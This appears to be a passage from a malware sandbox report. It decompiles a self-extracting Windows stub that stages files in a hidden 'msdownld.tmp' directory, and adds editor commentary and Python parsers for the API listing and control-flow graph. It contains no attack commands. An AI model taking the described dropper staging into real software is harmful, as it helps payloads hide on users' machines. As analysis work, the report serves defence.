                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 fd55a0-fd55d9 call fd468f LocalAlloc 235 fd55fd-fd560c call fd468f 232->235 236 fd55db-fd55f1 call fd44b9 call fd6285 232->236 241 fd560e-fd5630 call fd44b9 LocalFree 235->241 242 fd5632-fd5643 lstrcmpA 235->242 251 fd55f6-fd55f8 236->251 241->251 245 fd564b-fd5659 LocalFree 242->245 246 fd5645 242->246 249 fd565b-fd565d 245->249 250 fd5696-fd569c 245->250 246->245 254 fd565f-fd5667 249->254 255 fd5669 249->255 252 fd589f-fd58b5 call fd6517 250->252 253 fd56a2-fd56a8 250->253 256 fd58b7-fd58c7 call fd6ce0 251->256 252->256 253->252 257 fd56ae-fd56c1 GetTempPathA 253->257 254->255 258 fd566b-fd567a call fd5467 254->258 255->258 262 fd56f3-fd5711 call fd1781 257->262 263 fd56c3-fd56c9 call fd5467 257->263 270 fd589b-fd589d 258->270 271 fd5680-fd5691 call fd44b9 258->271 275 fd586c-fd5890 GetWindowsDirectoryA call fd597d 262->275 276 fd5717-fd5729 GetDriveTypeA 262->276 269 fd56ce-fd56d0 263->269 269->270 273 fd56d6-fd56df call fd2630 269->273 270->256 271->251 273->262 288 fd56e1-fd56ed call fd5467 273->288 275->262 289 fd5896 275->289 280 fd572b-fd572e 276->280 281 fd5730-fd5740 GetFileAttributesA 276->281 280->281 282 fd5742-fd5745 280->282 281->282 283 fd577e-fd578f call fd597d 281->283 286 fd576b 282->286 287 fd5747-fd574f 282->287 298 fd5791-fd579e call fd2630 283->298 299 fd57b2-fd57bf call fd2630 283->299 291 fd5771-fd5779 286->291 287->291 292 fd5751-fd5753 287->292 288->262 288->270 289->270 296 fd5864-fd5866 291->296 292->291 295 fd5755-fd5762 call fd6952 292->295 295->286 309 fd5764-fd5769 295->309 296->275 296->276 298->286 306 fd57a0-fd57b0 call fd597d 298->306 307 fd57c1-fd57cd GetWindowsDirectoryA 299->307 308 fd57d3-fd57f8 call fd658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 fd580a 308->314 315 fd57fa-fd5808 
CreateDirectoryA 308->315 309->283 309->286 316 fd580d-fd580f 314->316 315->316 317 fd5827-fd585c SetFileAttributesA call fd1781 call fd5467 316->317 318 fd5811-fd5825 316->318 317->270 323 fd585e 317->323 318->296 323->296
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00FD55A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E00FD468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E00FD468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0xfd9a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0xfd8b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0xfd8a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00FD6517(_t82, 0x7d2, 0, E00FD3210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0xfd9a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0xfd91e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0xfd91e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00FD1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00FD6952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00FD597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00FD2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104); // 0x104 = MAX_PATH
																				}
																				_t88 =  &_v268;
																				E00FD658A(_t88, 0x104, "msdownld.tmp"); // appends the staging directory name to the path buffer
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) { // 0xffffffff = INVALID_FILE_ATTRIBUTES
																					_t54 = _t53 & 0x00000010; // FILE_ATTRIBUTE_DIRECTORY: reuse only if the existing path is a directory
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2); // 2 = FILE_ATTRIBUTE_HIDDEN
																					_push(_t88);
																					_t109 = 0xfd91e4;
																					E00FD1781(0xfd91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00FD5467(0xfd91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1; // advance the drive letter (first byte of the path buffer)
																					_v265 = 0; // and truncate the buffer to "X:\" (byte 3)
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00FD2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00FD597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a; // 0x5a = 'Z'
											} while (_t60 <= 0x5a); // retry on the next drive letter until it passes 'Z'
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00FD5467(0xfd91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xfd91e4;
											_t70 = E00FD2630(0, 0xfd91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xfd91e4;
												_t71 = E00FD5467(0xfd91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00FD597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c; // 0x5c = '\'
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xfd8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00FD5467(0xfd8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00FD44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xfd9124 = 0x80070714; // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND)
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xfd9124 = E00FD6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00FD6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}
                                                                                                                                                                                                    0x00fd56d8
                                                                                                                                                                                                    0x00fd56dd
                                                                                                                                                                                                    0x00fd56df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56e1
                                                                                                                                                                                                    0x00fd56e2
                                                                                                                                                                                                    0x00fd56e4
                                                                                                                                                                                                    0x00fd56e6
                                                                                                                                                                                                    0x00fd56eb
                                                                                                                                                                                                    0x00fd56ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd586c
                                                                                                                                                                                                    0x00fd5878
                                                                                                                                                                                                    0x00fd587e
                                                                                                                                                                                                    0x00fd5882
                                                                                                                                                                                                    0x00fd5883
                                                                                                                                                                                                    0x00fd5889
                                                                                                                                                                                                    0x00fd588e
                                                                                                                                                                                                    0x00fd588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5896
                                                                                                                                                                                                    0x00fd56ed
                                                                                                                                                                                                    0x00fd56df
                                                                                                                                                                                                    0x00fd56d0
                                                                                                                                                                                                    0x00fd56c1
                                                                                                                                                                                                    0x00fd56a8
                                                                                                                                                                                                    0x00fd565b
                                                                                                                                                                                                    0x00fd565b
                                                                                                                                                                                                    0x00fd565d
                                                                                                                                                                                                    0x00fd5669
                                                                                                                                                                                                    0x00fd5669
                                                                                                                                                                                                    0x00fd565f
                                                                                                                                                                                                    0x00fd565f
                                                                                                                                                                                                    0x00fd5665
                                                                                                                                                                                                    0x00fd5667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5667
                                                                                                                                                                                                    0x00fd566c
                                                                                                                                                                                                    0x00fd5673
                                                                                                                                                                                                    0x00fd5678
                                                                                                                                                                                                    0x00fd567a
                                                                                                                                                                                                    0x00fd589b
                                                                                                                                                                                                    0x00fd589b
                                                                                                                                                                                                    0x00fd5680
                                                                                                                                                                                                    0x00fd5685
                                                                                                                                                                                                    0x00fd568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd568c
                                                                                                                                                                                                    0x00fd567a
                                                                                                                                                                                                    0x00fd560e
                                                                                                                                                                                                    0x00fd5613
                                                                                                                                                                                                    0x00fd561a
                                                                                                                                                                                                    0x00fd5620
                                                                                                                                                                                                    0x00fd5626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5626
                                                                                                                                                                                                    0x00fd55db
                                                                                                                                                                                                    0x00fd55e0
                                                                                                                                                                                                    0x00fd55e7
                                                                                                                                                                                                    0x00fd55f1
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd58b7
                                                                                                                                                                                                    0x00fd58c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00FD55CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00FD5638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00FD564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5620
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD56B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00FD571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00FD5737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00FD57CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00FD57EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00FD5802
                                                                                                                                                                                                      • Part of subcall function 00FD2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00FD2654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00FD5830
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
                                                                                                                                                                                                      • Part of subcall function 00FD6517: LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
                                                                                                                                                                                                      • Part of subcall function 00FD6517: DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00FD5878
                                                                                                                                                                                                      • Part of subcall function 00FD597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FD59A8
                                                                                                                                                                                                      • Part of subcall function 00FD597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00FD59AF
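The listing above is the report's API-reference view of the function around 00FD55CF: it resolves the temp path (IXP003.TMP), probes a drive letter, looks for msdownld.tmp under the Windows directory, creates a directory and changes its attributes. That is the staging-directory setup of a self-extracting dropper; the IXP###.TMP and msdownld.tmp names are the conventions of the Windows wextract/IExpress stub, which is this editor's reading of the strings, not a finding the report states. Two caveats when reading such lines: the values in parentheses are what the analyzer recovered from the stack at the call site and do not map one-to-one onto the API's formal parameters (note the recurring 0000005A at the front of the file-system calls), and the lines are not printed in address order. The following Python, an added example that is not part of the Joe Sandbox output, parses the listing into records, sorts the direct calls by their ref address to recover the in-function call order, pulls out the string literals, and maps each helper function (such as 00FD44B9) to the APIs it wraps. The sample input is a subset of the lines above, copied verbatim.

```python
"""Parse the API-reference listing Joe Sandbox prints beneath a function's
disassembly into records: in-function call order, string literals seen on
the stack, and the APIs each helper function wraps.
Added example, not part of the Joe Sandbox report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: a subset of the listing lines above, copied verbatim.
SAMPLE = r"""
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
  • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00FD55CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00FD5638
• LocalFree.KERNEL32(00000000), ref: 00FD564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5620
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD56B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00FD571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00FD5737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00FD57CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00FD57EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00FD5802
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00FD5830
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00FD5878
"""

# One listing line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(arg,arg,...) with an optional argument list, then "ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX_DWORD = re.compile(r"^[0-9A-F]{8}$")   # a raw stack dword, not a string


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]
    ref: int                        # address of the call site
    subcall: Optional[str] = None   # helper function the call belongs to, if any


def parse_api_refs(text: str) -> List[ApiRef]:
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue                # headings and non-API lines are ignored
        raw = m["args"]
        args = raw.split(",") if raw else []
        refs.append(ApiRef(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return refs


def direct_call_sequence(refs: List[ApiRef]) -> List[str]:
    """APIs the function calls itself, ordered by call-site address. The
    listing is not in address order (LocalFree at 564C precedes 5620)."""
    return [r.api for r in sorted(refs, key=lambda r: r.ref) if r.subcall is None]


def string_literals(refs: List[ApiRef]) -> List[str]:
    """Stack values the analyzer resolved to strings, in first-seen order;
    raw dwords (8 hex digits) and unresolved slots ('?') are dropped."""
    seen: List[str] = []
    for r in refs:
        for a in r.args:
            if a != "?" and not HEX_DWORD.match(a) and a not in seen:
                seen.append(a)
    return seen


def helper_map(refs: List[ApiRef]) -> Dict[str, List[str]]:
    """Helper address -> APIs it wraps (00FD44B9 is the MessageBoxA wrapper)."""
    out: Dict[str, List[str]] = {}
    for r in refs:
        if r.subcall is not None and r.api not in out.setdefault(r.subcall, []):
            out[r.subcall].append(r.api)
    return out


def calls_touching(refs: List[ApiRef], literal: str) -> List[str]:
    """Call sites whose recorded stack holds a given literal, e.g. which
    calls see 'msdownld.tmp' or the IXP003.TMP path."""
    return [f"{r.api}@{r.ref:08X}"
            for r in sorted(refs, key=lambda r: r.ref) if literal in r.args]


if __name__ == "__main__":
    refs = parse_api_refs(SAMPLE)
    print(" -> ".join(direct_call_sequence(refs)))
    print(string_literals(refs))
    print(helper_map(refs))
    print(calls_touching(refs, "msdownld.tmp"))
```

Run against the full listing of a function, `direct_call_sequence` gives the order in which the imports are hit, `string_literals` gives the file-system and resource names worth turning into host indicators, and `helper_map` lets you read the decompiler's `call fd44b9` style references as the API they stand for.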
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-752058184
                                                                                                                                                                                                    • Opcode ID: 70cbf23fc29233a732218d73bf22e64330ca25c94029ae9227502e9052ef5fab
                                                                                                                                                                                                    • Instruction ID: 47fac65aec787030bca9f76e313ec1beb50bb57501fbf8d44168b634eca6ff28
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70cbf23fc29233a732218d73bf22e64330ca25c94029ae9227502e9052ef5fab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C814A71E04A189BDB20AB709C85BEA736F9B61B50F1C00A7F586D2391EF74CDC1BA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    (Text form of the graph: each basic block appears as "<id> <start>[-<end>]" followed by the API and helper calls it contains; edges appear as "<src>-><dst>". The executed / not-executed colouring of the rendered graph is not preserved here.)
                                                                                                                                                                                                    control_flow_graph 324 fd597d-fd59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 fd59dd-fd5a1b GetDiskFreeSpaceA 324->325 326 fd59bb-fd59d8 call fd44b9 call fd6285 324->326 328 fd5ba1-fd5bde memset call fd6285 GetLastError FormatMessageA 325->328 329 fd5a21-fd5a4a MulDiv 325->329 345 fd5c05-fd5c14 call fd6ce0 326->345 337 fd5be3-fd5bfc call fd44b9 SetCurrentDirectoryA 328->337 329->328 331 fd5a50-fd5a6c GetVolumeInformationA 329->331 334 fd5a6e-fd5ab0 memset call fd6285 GetLastError FormatMessageA 331->334 335 fd5ab5-fd5aca SetCurrentDirectoryA 331->335 334->337 339 fd5acc-fd5ad1 335->339 351 fd5c02 337->351 343 fd5ad3-fd5ad8 339->343 344 fd5ae2-fd5ae4 339->344 343->344 347 fd5ada-fd5ae0 343->347 349 fd5ae7-fd5af8 344->349 350 fd5ae6 344->350 347->339 347->344 353 fd5af9-fd5afb 349->353 350->349 354 fd5c04 351->354 355 fd5afd-fd5b03 353->355 356 fd5b05-fd5b08 353->356 354->345 355->353 355->356 357 fd5b0a-fd5b1b call fd44b9 356->357 358 fd5b20-fd5b27 356->358 357->351 359 fd5b29-fd5b33 358->359 360 fd5b52-fd5b5b 358->360 359->360 363 fd5b35-fd5b50 359->363 364 fd5b62-fd5b6d 360->364 363->364 365 fd5b6f-fd5b74 364->365 366 fd5b76-fd5b7d 364->366 367 fd5b85 365->367 368 fd5b7f-fd5b81 366->368 369 fd5b83 366->369 370 fd5b87-fd5b94 call fd268b 367->370 371 fd5b96-fd5b9f 367->371 368->367 369->367 370->354 371->354
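The graph data above describes E00FD597D, the free-space check on the extraction target: save the current directory, change into the target, GetDiskFreeSpaceA, scale the result with MulDiv, GetVolumeInformationA, restore the directory. The failure branches build a message with GetLastError and FormatMessageA and go through 00FD44B9, which the API listing identifies as the MessageBoxA wrapper, before rejoining the exit block. The Python below, an added example not taken from the report, parses that one-line graph into blocks and edges and separates the success path from the error-handling blocks; the heuristic that a block calling FormatMessageA, GetLastError, 00FD44B9 or 00FD6285 (the GetLastError wrapper in the listing) is an error handler is an assumption of this example. CFG_TEXT is the graph line copied from the report.

```python
"""Parse the one-line control-flow graph Joe Sandbox emits for a function
and split it into success-path blocks and error-handling blocks.
Added example; CFG_TEXT is copied from the report, the error-block
heuristic is an assumption of this example."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Copied from the report's "Control-flow Graph" line for E00FD597D.
CFG_TEXT = """control_flow_graph 324 fd597d-fd59b9 GetCurrentDirectoryA SetCurrentDirectoryA
325 fd59dd-fd5a1b GetDiskFreeSpaceA 324->325 326 fd59bb-fd59d8 call fd44b9 call fd6285 324->326
328 fd5ba1-fd5bde memset call fd6285 GetLastError FormatMessageA 325->328 329 fd5a21-fd5a4a MulDiv
325->329 345 fd5c05-fd5c14 call fd6ce0 326->345 337 fd5be3-fd5bfc call fd44b9 SetCurrentDirectoryA
328->337 329->328 331 fd5a50-fd5a6c GetVolumeInformationA 329->331 334 fd5a6e-fd5ab0 memset
call fd6285 GetLastError FormatMessageA 331->334 335 fd5ab5-fd5aca SetCurrentDirectoryA 331->335
334->337 339 fd5acc-fd5ad1 335->339 351 fd5c02 337->351 343 fd5ad3-fd5ad8 339->343 344 fd5ae2-fd5ae4
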